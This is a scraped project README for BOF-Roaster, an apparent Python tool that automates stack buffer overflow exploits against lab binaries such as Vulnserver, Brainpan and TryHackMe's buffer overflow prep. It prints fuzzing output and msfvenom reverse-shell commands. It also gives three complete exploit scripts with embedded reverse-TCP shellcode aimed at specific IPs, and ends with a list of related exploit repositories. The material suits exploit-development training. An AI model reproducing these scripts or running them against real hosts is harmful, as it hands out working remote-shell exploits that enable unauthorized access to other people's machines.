BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3.

Overview

BOF-Roaster

BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3. On first release it was able to successfully break many of the most well-known buffer overflow example executables. Which are

1-Brainpan

2-Vulnserver

3-Dostackbufferoverflowgood

4-bufferoverflowprep from TryHackMe

Still in progress.

Installation

To use this project first you have to install 32 bit radare2 binary in your windows computer. From here, and add it to path variables. You can follow these steps. And you have to install r2pipe library.

pip install r2pipe

TODO

Calculating offset between EIP and ESP register is missing, for the moment we have to give it from command line.

Finding proper jmp esp address is not ok currently.

Usage

 python .\main.py --ip 127.0.0.1 --port <RUNNING-PORT> --vuln_exe <PATH OF EXECUTABLE>  
   --fuzz_counter <FUZZING INCREASE COUNTER> --prefix <PREFIX BEFORE SHELLCODE> --output <OUTPUT OF POC EXPLOIT>

For example:

 python .\main.py --ip 127.0.0.1 --port 1337 --vuln_exe .\example_exes\oscp.exe 
    --vuln_dll .\example_exes\essfunc.dll  --fuzz_counter 300 --prefix "OVERFLOW3 " --output overflow3_poc.py

In this case executable is oscp.exe executable also need for dll, essfunc.dll is dll of that exe. fuzz_counter is 300 so it will fuzz with "A" increasing count by 300. Prefix is "OVERFLOW3 " so it means executable is vulnerable if we write OVERFLOW3 in the first place. overflow3_poc.py is the name of the file for our poc executable.

Examples

Different vulnerable executables used for example.

1 - Vulnserver

Executable program link is here.

Run program like this:

python .\main.py --ip 192.168.1.21 --port 9999 --vuln_exe example_exes\vulnserver\vulnserver.exe 
 --vuln_dll example_exes\vulnserver\essfunc.dll --prefix 'TRUN /.:/' --fuzz_counter 700

and output is:

Fuzzing with 700 bytes
Fuzzing with 1400 bytes
Fuzzing with 2100 bytes
Fuzzing crashed at 2100 bytes
[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  2003 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00'
Linux:         msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00'

      
     
    
   

So at the end we were able to find offset 2003, badchars \x00 only in this case. Proper jmp esp address which is \xaf\x11\x50\x62 and our POC exploit file is written under exploit_poc.py file. We just have to change buf variable with our shellcode. And we can create shellcode with given msfvenom command. Output of that msfvenom command is:

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.9.3.61 LPORT=8080 -f py -b '\x00' 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xba\x60\x42\xe1\xcb\xda\xc6\xd9\x74\x24\xf4\x5f\x2b"
buf += b"\xc9\xb1\x52\x31\x57\x12\x83\xc7\x04\x03\x37\x4c\x03"
buf += b"\x3e\x4b\xb8\x41\xc1\xb3\x39\x26\x4b\x56\x08\x66\x2f"
buf += b"\x13\x3b\x56\x3b\x71\xb0\x1d\x69\x61\x43\x53\xa6\x86"
buf += b"\xe4\xde\x90\xa9\xf5\x73\xe0\xa8\x75\x8e\x35\x0a\x47"
buf += b"\x41\x48\x4b\x80\xbc\xa1\x19\x59\xca\x14\x8d\xee\x86"
buf += b"\xa4\x26\xbc\x07\xad\xdb\x75\x29\x9c\x4a\x0d\x70\x3e"
buf += b"\x6d\xc2\x08\x77\x75\x07\x34\xc1\x0e\xf3\xc2\xd0\xc6"
buf += b"\xcd\x2b\x7e\x27\xe2\xd9\x7e\x60\xc5\x01\xf5\x98\x35"
buf += b"\xbf\x0e\x5f\x47\x1b\x9a\x7b\xef\xe8\x3c\xa7\x11\x3c"
buf += b"\xda\x2c\x1d\x89\xa8\x6a\x02\x0c\x7c\x01\x3e\x85\x83"
buf += b"\xc5\xb6\xdd\xa7\xc1\x93\x86\xc6\x50\x7e\x68\xf6\x82"
buf += b"\x21\xd5\x52\xc9\xcc\x02\xef\x90\x98\xe7\xc2\x2a\x59"
buf += b"\x60\x54\x59\x6b\x2f\xce\xf5\xc7\xb8\xc8\x02\x27\x93"
buf += b"\xad\x9c\xd6\x1c\xce\xb5\x1c\x48\x9e\xad\xb5\xf1\x75"
buf += b"\x2d\x39\x24\xd9\x7d\x95\x97\x9a\x2d\x55\x48\x73\x27"
buf += b"\x5a\xb7\x63\x48\xb0\xd0\x0e\xb3\x53\xd5\xc7\xb8\x9e"
buf += b"\x81\xd5\xbe\xff\xc1\x53\x58\x95\xf1\x35\xf3\x02\x6b"
buf += b"\x1c\x8f\xb3\x74\x8a\xea\xf4\xff\x39\x0b\xba\xf7\x34"
buf += b"\x1f\x2b\xf8\x02\x7d\xfa\x07\xb9\xe9\x60\x95\x26\xe9"
buf += b"\xef\x86\xf0\xbe\xb8\x79\x09\x2a\x55\x23\xa3\x48\xa4"
buf += b"\xb5\x8c\xc8\x73\x06\x12\xd1\xf6\x32\x30\xc1\xce\xbb"
buf += b"\x7c\xb5\x9e\xed\x2a\x63\x59\x44\x9d\xdd\x33\x3b\x77"
buf += b"\x89\xc2\x77\x48\xcf\xca\x5d\x3e\x2f\x7a\x08\x07\x50"
buf += b"\xb3\xdc\x8f\x29\xa9\x7c\x6f\xe0\x69\x8c\x3a\xa8\xd8"
buf += b"\x05\xe3\x39\x59\x48\x14\x94\x9e\x75\x97\x1c\x5f\x82"
buf += b"\x87\x55\x5a\xce\x0f\x86\x16\x5f\xfa\xa8\x85\x60\x2f"

So we can basically copy that buf variable and paste that in our code. And we are done. At the end our script will be:

import socket
prefix = 'TRUN /.:/'
filler = 2003 * "A" 
eip = '\xaf\x11\x50\x62'
offset = 10 * "�"
buf =  b""
buf += b"\xba\x60\x42\xe1\xcb\xda\xc6\xd9\x74\x24\xf4\x5f\x2b"
buf += b"\xc9\xb1\x52\x31\x57\x12\x83\xc7\x04\x03\x37\x4c\x03"
buf += b"\x3e\x4b\xb8\x41\xc1\xb3\x39\x26\x4b\x56\x08\x66\x2f"
buf += b"\x13\x3b\x56\x3b\x71\xb0\x1d\x69\x61\x43\x53\xa6\x86"
buf += b"\xe4\xde\x90\xa9\xf5\x73\xe0\xa8\x75\x8e\x35\x0a\x47"
buf += b"\x41\x48\x4b\x80\xbc\xa1\x19\x59\xca\x14\x8d\xee\x86"
buf += b"\xa4\x26\xbc\x07\xad\xdb\x75\x29\x9c\x4a\x0d\x70\x3e"
buf += b"\x6d\xc2\x08\x77\x75\x07\x34\xc1\x0e\xf3\xc2\xd0\xc6"
buf += b"\xcd\x2b\x7e\x27\xe2\xd9\x7e\x60\xc5\x01\xf5\x98\x35"
buf += b"\xbf\x0e\x5f\x47\x1b\x9a\x7b\xef\xe8\x3c\xa7\x11\x3c"
buf += b"\xda\x2c\x1d\x89\xa8\x6a\x02\x0c\x7c\x01\x3e\x85\x83"
buf += b"\xc5\xb6\xdd\xa7\xc1\x93\x86\xc6\x50\x7e\x68\xf6\x82"
buf += b"\x21\xd5\x52\xc9\xcc\x02\xef\x90\x98\xe7\xc2\x2a\x59"
buf += b"\x60\x54\x59\x6b\x2f\xce\xf5\xc7\xb8\xc8\x02\x27\x93"
buf += b"\xad\x9c\xd6\x1c\xce\xb5\x1c\x48\x9e\xad\xb5\xf1\x75"
buf += b"\x2d\x39\x24\xd9\x7d\x95\x97\x9a\x2d\x55\x48\x73\x27"
buf += b"\x5a\xb7\x63\x48\xb0\xd0\x0e\xb3\x53\xd5\xc7\xb8\x9e"
buf += b"\x81\xd5\xbe\xff\xc1\x53\x58\x95\xf1\x35\xf3\x02\x6b"
buf += b"\x1c\x8f\xb3\x74\x8a\xea\xf4\xff\x39\x0b\xba\xf7\x34"
buf += b"\x1f\x2b\xf8\x02\x7d\xfa\x07\xb9\xe9\x60\x95\x26\xe9"
buf += b"\xef\x86\xf0\xbe\xb8\x79\x09\x2a\x55\x23\xa3\x48\xa4"
buf += b"\xb5\x8c\xc8\x73\x06\x12\xd1\xf6\x32\x30\xc1\xce\xbb"
buf += b"\x7c\xb5\x9e\xed\x2a\x63\x59\x44\x9d\xdd\x33\x3b\x77"
buf += b"\x89\xc2\x77\x48\xcf\xca\x5d\x3e\x2f\x7a\x08\x07\x50"
buf += b"\xb3\xdc\x8f\x29\xa9\x7c\x6f\xe0\x69\x8c\x3a\xa8\xd8"
buf += b"\x05\xe3\x39\x59\x48\x14\x94\x9e\x75\x97\x1c\x5f\x82"
buf += b"\x87\x55\x5a\xce\x0f\x86\x16\x5f\xfa\xa8\x85\x60\x2f"
endfix = ''
ip = '10.10.132.141'
port = 9999
buffer = bytes(prefix, "latin-1") + bytes(filler, "latin-1") + bytes(eip, "latin-1") +  bytes(offset, "latin-1") + buf + bytes(endfix, "latin-1")
timeout = 5
try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)
        s.send(buffer)
        s.recv(1024)
except:
    pass

2 - Dostackbufferoverflowgood

Executable & walktrough repository is here.

Run program like this:

 python .\main.py --ip 127.0.0.1 --port 31337 --vuln_exe example_exes\dostackbufferoverflowgood\dostackbufferoverflowgood.exe  --fuzz_counter 100

and output is:

Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing crashed at 200 bytes
[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  146 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x0a
[ * ] Found proper 'jmp esp' address to use. Address:  \xc3\x14\x04\x08
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x0a'
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x0a'

      
     
    
   

So at the end we were able to find offset 146, badchars \x00\x0a in this case. Proper jmp esp address which is \xc3\x14\x04\x08 and our POC exploit file is written under exploit_poc.py file. We just have to change buf variable with our shellcode. And we can create shellcode with given msfvenom command. After copy pasting msfvenom output our exploit will be ready. Latest script is like:

import socket
prefix = ''
filler = 146 * "A" 
eip = '\xc3\x14\x04\x08'
offset = 10 * "�"
buf =  b""
buf += b"\xda\xd1\xba\xb3\x84\xbf\x84\xd9\x74\x24\xf4\x5e\x33"
buf += b"\xc9\xb1\x52\x83\xc6\x04\x31\x56\x13\x03\xe5\x97\x5d"
buf += b"\x71\xf5\x70\x23\x7a\x05\x81\x44\xf2\xe0\xb0\x44\x60"
buf += b"\x61\xe2\x74\xe2\x27\x0f\xfe\xa6\xd3\x84\x72\x6f\xd4"
buf += b"\x2d\x38\x49\xdb\xae\x11\xa9\x7a\x2d\x68\xfe\x5c\x0c"
buf += b"\xa3\xf3\x9d\x49\xde\xfe\xcf\x02\x94\xad\xff\x27\xe0"
buf += b"\x6d\x74\x7b\xe4\xf5\x69\xcc\x07\xd7\x3c\x46\x5e\xf7"
buf += b"\xbf\x8b\xea\xbe\xa7\xc8\xd7\x09\x5c\x3a\xa3\x8b\xb4"
buf += b"\x72\x4c\x27\xf9\xba\xbf\x39\x3e\x7c\x20\x4c\x36\x7e"
buf += b"\xdd\x57\x8d\xfc\x39\xdd\x15\xa6\xca\x45\xf1\x56\x1e"
buf += b"\x13\x72\x54\xeb\x57\xdc\x79\xea\xb4\x57\x85\x67\x3b"
buf += b"\xb7\x0f\x33\x18\x13\x4b\xe7\x01\x02\x31\x46\x3d\x54"
buf += b"\x9a\x37\x9b\x1f\x37\x23\x96\x42\x50\x80\x9b\x7c\xa0"
buf += b"\x8e\xac\x0f\x92\x11\x07\x87\x9e\xda\x81\x50\xe0\xf0"
buf += b"\x76\xce\x1f\xfb\x86\xc7\xdb\xaf\xd6\x7f\xcd\xcf\xbc"
buf += b"\x7f\xf2\x05\x12\x2f\x5c\xf6\xd3\x9f\x1c\xa6\xbb\xf5"
buf += b"\x92\x99\xdc\xf6\x78\xb2\x77\x0d\xeb\xb7\x8e\x0e\xd6"
buf += b"\xaf\x92\x10\x29\x8b\x1a\xf6\x43\xfb\x4a\xa1\xfb\x62"
buf += b"\xd7\x39\x9d\x6b\xcd\x44\x9d\xe0\xe2\xb9\x50\x01\x8e"
buf += b"\xa9\x05\xe1\xc5\x93\x80\xfe\xf3\xbb\x4f\x6c\x98\x3b"
buf += b"\x19\x8d\x37\x6c\x4e\x63\x4e\xf8\x62\xda\xf8\x1e\x7f"
buf += b"\xba\xc3\x9a\xa4\x7f\xcd\x23\x28\x3b\xe9\x33\xf4\xc4"
buf += b"\xb5\x67\xa8\x92\x63\xd1\x0e\x4d\xc2\x8b\xd8\x22\x8c"
buf += b"\x5b\x9c\x08\x0f\x1d\xa1\x44\xf9\xc1\x10\x31\xbc\xfe"
buf += b"\x9d\xd5\x48\x87\xc3\x45\xb6\x52\x40\x75\xfd\xfe\xe1"
buf += b"\x1e\x58\x6b\xb0\x42\x5b\x46\xf7\x7a\xd8\x62\x88\x78"
buf += b"\xc0\x07\x8d\xc5\x46\xf4\xff\x56\x23\xfa\xac\x57\x66"
endfix = '\r\n'
ip = '10.10.150.201'
port = 31337
buffer =  bytes(filler, "latin-1") + bytes(eip, "latin-1") +  bytes(offset, "latin-1") + buf + bytes(endfix, "latin-1")
timeout = 5
try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.send(buffer)
        s.recv(1024)
except:
    pass

3 - Brainpan 1

Link for brainpan1 exe and whole machine is here.

Run program like this:

 python .\main.py --ip 127.0.0.1 --port 9999 --vuln_exe example_exes\brainpan.exe  --fuzz_counter 100

and output is:

Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing crashed at 700 bytes
[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  524 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00
[ * ] Found proper 'jmp esp' address to use. Address:  \xf3\x12\x17\x31
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it. 
[ * ] You can generate shellcode with using this command with proper IP and PORT. 
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00'
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00'   

      
     
    
   

So at the end we were able to find offset 524, badchars \x00 in this case. Proper jmp esp address which is \xf3\x12\x17\x31 and our POC exploit file is written under exploit_poc.py file. We just have to change buf variable with our shellcode. And we can create shellcode with given msfvenom command. After copy pasting msfvenom output our exploit will be ready. Latest script is like:

import socket
prefix = ''
filler = 524 * "A"
eip = '\xf3\x12\x17\x31'
offset = 10 * "�"
buf =  b""
buf += b"\xdb\xdc\xbf\x8e\x25\xac\x67\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x12\x31\x7a\x17\x03\x7a\x17\x83\x4c\x21\x4e"
buf += b"\x92\x61\xf1\x79\xbe\xd2\x46\xd5\x2b\xd6\xc1\x38\x1b"
buf += b"\xb0\x1c\x3a\xcf\x65\x2f\x04\x3d\x15\x06\x02\x44\x7d"
buf += b"\x59\x5c\xb7\x69\x31\x9f\xb8\x90\x7a\x16\x59\x22\x1a"
buf += b"\x79\xcb\x11\x50\x7a\x62\x74\x5b\xfd\x26\x1e\x0a\xd1"
buf += b"\xb5\xb6\xba\x02\x15\x24\x52\xd4\x8a\xfa\xf7\x6f\xad"
buf += b"\x4a\xfc\xa2\xae"
endfix = "\r\n"
ip = '192.168.1.26'
port = 9999
buffer = bytes(prefix, "latin-1") + bytes(filler, "latin-1") + bytes(eip, "latin-1") +  bytes(offset, "latin-1") + buf + bytes(endfix, "latin-1")
timeout = 5
try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.send(buffer)
        s.recv(1024)
except:
    pass    

4 - TryHackMe Bufferoverflow Prep

https://tryhackme.com/room/bufferoverflowprep

https://medium.com/swlh/tryhackme-buffer-overflow-prep-9b2ece17a13c

Overflow1

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  1978 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x07\x2e\xa0
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x07\x2e\xa0'  
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x07\x2e\xa0'

      
     
    
   

Overflow2

For overflow2 as i see also with immunity debugger and with radare2 overwritten EIP is broken.

This is from radare2

(5324) Fatal Exception C0000005 (EXCEPTION_ACCESS_VIOLATION) in thread 23708
Hint: Use 'dce' continue into exception handler
[0x76413177]> dr
edi = 0x00401973
esi = 0x00401974
ebx = 0x39754138
edx = 0x00000000
ecx = 0x00805c2c
eax = 0x02cff755
ebp = 0x41307641
eip = 0x76413177
eflags = 0x00010246
esp = 0x02cffa18
[0x76413177]>

And it shows that eip is 76413177 but it should be 76413176

┌──(kaancaglan㉿kaancaglan)-[~]
└─$ msf-pattern_offset -l 1000 -q 76413177
[*] No exact matches, looking for likely candidates...
[+] Possible match at offset 634 (adjusted [ little-endian: 1 | big-endian: 1044481 ] ) byte offset 0
[+] Possible match at offset 664 (adjusted [ little-endian: -16777216 | big-endian: -15732736 ] ) byte offset 3
                                                                                                                                                                                                                                              
┌──(kaancaglan㉿kaancaglan)-[~]
└─$ msf-pattern_offset -l 1000 -q 76413176                                                                                                                                                                                                1 ⨯
[*] Exact match at offset 634

I don't know this one. Its on my TODO list for now.

Overflow3

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  1274 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x11\x40\x5f\xb8\xee
[ - ] ESP:  0x625011af  failed.
[ - ] ESP:  0x625011bb  failed.
[ - ] ESP:  0x625011c7  failed.
[ - ] ESP:  0x625011d3  failed.
[ - ] ESP:  0x625011df  failed.
[ - ] ESP:  0x625011eb  failed.
[ - ] ESP:  0x625011f7  failed.
[ * ] Found proper 'jmp esp' address to use. Address:  \x03\x12\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x11\x40\x5f\xb8\xee' 
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x11\x40\x5f\xb8\xee' 

      
     
    
   

Overflow4

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  2026 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\xa9\xcd\xd4
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\xa9\xcd\xd4'
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\xa9\xcd\xd4'

      
     
    
   

Overflow5

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  314 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x16\x2f\xf4\xfd
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x16\x2f\xf4\xfd'
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x16\x2f\xf4\xfd'

      
     
    
   

Overflow6

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  1034 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x08\x2c\xad
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x08\x2c\xad'  
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x08\x2c\xad

      
     
    
   

Overflow7

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  1306 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x8c\xae\xbe\xfb
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x8c\xae\xbe\xfb'
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x8c\xae\xbe\xfb'

      
     
    
   

Overflow8

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  1786 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x1d\x2e\xc7\xee
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x1d\x2e\xc7\xee'  
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x1d\x2e\xc7\xee'

      
     
    
   

Overflow9

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  1514 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\x04\x3e\x3f\xe1
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\x04\x3e\x3f\xe1'
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\x04\x3e\x3f\xe1

      
     
    
   

Overflow10

[ * ] Program crashed with initial buffer. EIP register is overwritten with:  0x41414141
[ * ] Offset is:  537 . EIP Register is successfuly overwritten with:  0x42424242
... Founding bad chars!
[ * ] All badchars are found!:   \x00\xa0\xad\xbe\xde\xef
[ * ] Found proper 'jmp esp' address to use. Address:  \xaf\x11\x50\x62
[ * ] Exploit POC file written in 'exploit_poc.py' file. Change shellcode - buff and use it.
[ * ] You can generate shellcode with using this command with proper IP and PORT.
Windows:        msfvenom -p windows/shell_reverse_tcp LHOST=
   
     LPORT=
    
      -f py -b '\x00\xa0\xad\xbe\xde\xef'        
Linux:          msfvenom -p linux/x86/shell_reverse_tcp LHOST=
     
       LPORT=
      
        -f py -b '\x00\xa0\xad\xbe\xde\xef'

      
     
    
   
You might also like...
Cisco RV110w UPnP stack overflow
Cisco RV110w UPnP stack overflow

Cisco RV110W UPnP 0day 分析 前言 最近UPnP比较火,恰好手里有一台Cisco RV110W,在2021年8月份思科官方公布了一个Cisco RV系列关于UPnP的0day,但是具体的细节并没有公布出来。于是想要用手中的设备调试挖掘一下这个漏洞,漏洞的公告可以在官网看到。 准

This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

RemoteMouse-3.008-Exploit The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to

Nmap automated port scanner written in Python

port-scanner Nmap automated port scanner written in Python. USE: Clone the module Import the module: from portscanModule import portscanner Use: ports

A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C

This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.

PYTHON-EXPLOITATION This is a repository filled with scripts that were made with Python, and designed to exploit computer systems. Networking tcp_clin

Python exploit for vsftpd 2.3.4 - Backdoor Command Execution
Python exploit for vsftpd 2.3.4 - Backdoor Command Execution

CVE-2011-2523 - vsftpd 2.3.4 Exploit Discription vsftpd, which stands for Very Secure FTP Daemon,is an FTP server for Unix-like systems, including Lin

Python exploit code for CVE-2021-4034 (pwnkit)

Python3 code to exploit CVE-2021-4034 (PWNKIT). This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works

😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.
😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.

😭 WSOB (CVE-2022-29464) 😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. CVE-2022-29464 details:

Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129

Comments
Owner
Kaan Caglan
Some random stuffs
Kaan Caglan
Buff A simple BOF library I wrote under an hour to help me automate with BOF attack

What is Buff? A simple BOF library I wrote under an hour to help me automate with BOF attack. It comes with fuzzer and a generic method to generate ex

0x00 3 Nov 21, 2022
Windows Stack Based Auto Buffer Overflow Exploiter

Autoflow - Windows Stack Based Auto Buffer Overflow Exploiter Autoflow is a tool that exploits windows stack based buffer overflow automatically.

Himanshu Shukla 19 Dec 22, 2022
Buffer Overflow para SLmail5.5 32 bits

SLmail5.5-Exploit-BoF Buffer Overflow para SLmail5.5 32 bits con un par de utilidades para que puedas hacer el tuyo REQUISITOS PARA QUE FUNCIONE: Desa

Luis Javier 15 Jul 30, 2022
AnonStress-Stored-XSS-Exploit - An exploit and demonstration on how to exploit a Stored XSS vulnerability in anonstress

AnonStress Stored XSS Exploit An exploit and demonstration on how to exploit a S

صلى الله على محمد وآله 3 Jun 22, 2022
Tinyman exploit finder - Tinyman exploit finder for python

tinyman_exploit_finder There was a big tinyman exploit. You can read about it he

fish.exe 9 Dec 27, 2022
Discord-email-spammer-exploit - A discord email spammer exploit with python

Discord-email-spammer-exploit was made by Love ❌ code ✅ ?? ・Description First it

Rdimo 25 Aug 13, 2022
Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP

null 258 Jan 2, 2023
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

null 3 Aug 13, 2022
Automated tool to find & created Exploit Poc for Clickjacking Vulnerability

ClickJackPoc This tool will help you automate finding Clickjacking Vulnerability by just passing a file containing list of Targets . Once the Target i

Chirag Agrawal 24 Dec 19, 2022
CVE-2021-40346 integer overflow enables http smuggling

CVE-2021-40346-POC CVE-2021-40346 integer overflow enables http smuggling Reference: https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021

donky16 34 Nov 15, 2022